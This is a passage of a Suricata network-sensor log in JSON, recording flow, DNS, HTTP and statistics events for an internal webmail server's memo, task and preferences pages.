"memuse":79860,"memcap":0}}} {"timestamp":"2020-02-29T00:00:42.001673+0000","flow_id":973732042355293,"event_type":"flow","src_ip":"192.168.10.122","src_port":51531,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:41.176733+0000","end":"2020-02-28T23:55:41.284558+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:42.391403+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53380,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59919,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:42.497019+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53380,"proto":"UDP","dns":{"type":"answer","id":59919,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:42.497019+0000","flow_id":370778783283435,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53380,"proto":"UDP","dns":{"type":"answer","id":59919,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:42.592216+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5734}} {"timestamp":"2020-02-29T00:00:43.093621+0000","flow_id":2150733489452806,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52636,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5414},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:44.604989+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59941,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31014,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:44.710471+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59941,"proto":"UDP","dns":{"type":"answer","id":31014,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:44.710471+0000","flow_id":2022601730571069,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59941,"proto":"UDP","dns":{"type":"answer","id":31014,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:44.908834+0000","flow_id":985912589424072,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34688,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task\/save.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/nag\/list.php","length":20}} {"timestamp":"2020-02-29T00:00:44.913706+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44624,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:45.019117+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44196,"proto":"UDP","dns":{"type":"answer","id":44624,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:45.019117+0000","flow_id":1186461792399658,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44196,"proto":"UDP","dns":{"type":"answer","id":44624,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:45.980555+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5734},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":21109,"tx_id":0}} {"timestamp":"2020-02-29T00:00:45.989956+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56423,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31059,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:46.000124+0000","flow_id":2034129418565450,"event_type":"flow","src_ip":"192.168.10.81","src_port":52608,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":751,"bytes_toclient":952,"start":"2020-02-28T23:59:39.898890+0000","end":"2020-02-28T23:59:44.908679+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000341+0000","flow_id":1917856063927441,"event_type":"flow","src_ip":"192.168.10.81","src_port":52606,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":6,"bytes_toserver":747,"bytes_toclient":1857,"start":"2020-02-28T23:59:39.898193+0000","end":"2020-02-28T23:59:44.910626+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000416+0000","flow_id":376508265507704,"event_type":"flow","src_ip":"192.168.10.81","src_port":52600,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":742,"bytes_toclient":798,"start":"2020-02-28T23:59:39.895864+0000","end":"2020-02-28T23:59:44.911116+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000484+0000","flow_id":106410657166283,"event_type":"flow","src_ip":"192.168.10.81","src_port":52604,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1839,"bytes_toclient":7040,"start":"2020-02-28T23:59:39.897995+0000","end":"2020-02-28T23:59:44.919065+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000556+0000","flow_id":2223004900341093,"event_type":"flow","src_ip":"192.168.10.81","src_port":52598,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":14,"bytes_toserver":1744,"bytes_toclient":13124,"start":"2020-02-28T23:59:39.734565+0000","end":"2020-02-28T23:59:44.918735+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.000659+0000","flow_id":1630131894431570,"event_type":"flow","src_ip":"192.168.10.122","src_port":35446,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:45.536402+0000","end":"2020-02-28T23:55:45.644702+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:46.000727+0000","flow_id":1669280536703290,"event_type":"flow","src_ip":"192.168.10.81","src_port":52602,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":40,"pkts_toclient":40,"bytes_toserver":3859,"bytes_toclient":50594,"start":"2020-02-28T23:59:39.897338+0000","end":"2020-02-28T23:59:45.052284+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:46.095007+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56423,"proto":"UDP","dns":{"type":"answer","id":31059,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:46.095007+0000","flow_id":2122532734704388,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56423,"proto":"UDP","dns":{"type":"answer","id":31059,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:46.141331+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=delete_memos","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20}} {"timestamp":"2020-02-29T00:00:46.155742+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59463,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":20092,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:46.261061+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59463,"proto":"UDP","dns":{"type":"answer","id":20092,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:46.261061+0000","flow_id":1206437685387358,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59463,"proto":"UDP","dns":{"type":"answer","id":20092,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:46.311420+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3439}} {"timestamp":"2020-02-29T00:00:49.000173+0000","event_type":"stats","stats":{"uptime":13701,"capture":{"kernel_packets":131881,"kernel_drops":0},"decoder":{"pkts":131892,"bytes":91639214,"invalid":176,"ipv4":130475,"ipv6":8,"ethernet":131892,"raw":0,"null":0,"sll":0,"tcp":125527,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2624,"new_pruned":15,"est_pruned":2215,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20170,"memcap_state":0,"memcap_global":0},"http":{"memuse":54466,"memcap":0}}} {"timestamp":"2020-02-29T00:00:51.000587+0000","flow_id":1764268018371447,"event_type":"flow","src_ip":"192.168.10.122","src_port":43607,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:50.134007+0000","end":"2020-02-28T23:55:50.242455+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:51.002278+0000","flow_id":1372824699014401,"event_type":"flow","src_ip":"192.168.10.122","src_port":36975,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:50.396545+0000","end":"2020-02-28T23:55:50.504392+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:51.314253+0000","flow_id":2118594249540551,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?memo=xGugmcpHiOSNHZkbtVVjAx7&memolist=zrRtpfxW0Ej7ISTKAw6mYJl&actionID=modify_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3439},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":16944,"tx_id":2}} {"timestamp":"2020-02-29T00:00:52.000622+0000","flow_id":931516809444240,"event_type":"flow","src_ip":"192.168.10.122","src_port":37867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:51.686992+0000","end":"2020-02-28T23:55:51.794880+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:55.000149+0000","flow_id":423121546112077,"event_type":"flow","src_ip":"192.168.10.81","src_port":52610,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":23,"bytes_toserver":4627,"bytes_toclient":18466,"start":"2020-02-28T23:59:47.060493+0000","end":"2020-02-28T23:59:53.055087+0000","age":6,"state":"closed","reason":"timeout","alerted":true},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.001755+0000","flow_id":1730797353766896,"event_type":"flow","src_ip":"192.168.10.81","src_port":52616,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1876,"bytes_toclient":5082,"start":"2020-02-28T23:59:47.987120+0000","end":"2020-02-28T23:59:53.055044+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.002779+0000","flow_id":2195066138595643,"event_type":"flow","src_ip":"192.168.10.81","src_port":52620,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1877,"bytes_toclient":4848,"start":"2020-02-28T23:59:47.987451+0000","end":"2020-02-28T23:59:53.056574+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.003615+0000","flow_id":1364127405772621,"event_type":"flow","src_ip":"192.168.10.81","src_port":52614,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1881,"bytes_toclient":4146,"start":"2020-02-28T23:59:47.986957+0000","end":"2020-02-28T23:59:53.056615+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:55.004287+0000","flow_id":815591362597012,"event_type":"flow","src_ip":"192.168.10.81","src_port":52618,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":18,"bytes_toserver":3690,"bytes_toclient":16828,"start":"2020-02-28T23:59:47.987284+0000","end":"2020-02-28T23:59:53.171824+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:56.000163+0000","event_type":"stats","stats":{"uptime":13708,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2624,"new_pruned":15,"est_pruned":2218,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":5,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":2257,"memcap":0}}} {"timestamp":"2020-02-29T00:00:56.001332+0000","flow_id":75620021953358,"event_type":"flow","src_ip":"192.168.10.122","src_port":58313,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:55.844622+0000","end":"2020-02-28T23:55:55.956115+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:56.001411+0000","flow_id":982596855727262,"event_type":"flow","src_ip":"192.168.10.122","src_port":44985,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:55.591006+0000","end":"2020-02-28T23:55:55.699356+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:57.000760+0000","flow_id":1865350074121926,"event_type":"flow","src_ip":"192.168.10.122","src_port":52535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:56.245446+0000","end":"2020-02-28T23:55:56.353917+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:01:03.000383+0000","event_type":"stats","stats":{"uptime":13715,"capture":{"kernel_packets":131898,"kernel_drops":0},"decoder":{"pkts":131899,"bytes":91639628,"invalid":176,"ipv4":130480,"ipv6":8,"ethernet":131899,"raw":0,"null":0,"sll":0,"tcp":125532,"udp":4758,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2651,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2667,"synack":2658,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":135,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1699,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2168,"failed_udp":106},"tx":{"http":4381,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2244}},"flow_mgr":{"closed_pruned":2629,"new_pruned":15,"est_pruned":2221,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":2257,"memcap":0}}} {"timestamp":"2020-02-29T00:01:04.000551+0000","flow_id":1157019786067524,"event_type":"flow","src_ip":"192.168.10.130","src_port":34678,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":18,"bytes_toserver":2044,"bytes_toclient":16835,"start":"2020-02-28T23:59:20.376388+0000","end":"2020-02-29T00:00:03.894198+0000","age":43,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:07.000910+0000","flow_id":1265931569107445,"event_type":"flow","src_ip":"192.168.10.130","src_port":34680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":15,"bytes_toserver":1762,"bytes_toclient":13104,"start":"2020-02-28T23:59:56.365045+0000","end":"2020-02-29T00:00:06.130670+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:01:08.000546+0000","flow_id":741056500184452,"event_type":"flow","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":49,"pkts_toclient":52,"bytes_toserver":11993,"bytes_toclient":43282,"start":"2020-02-28T23:59:47.963972+0000","end":"2020-02-29T00:00:07.960343+0000","age":20,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 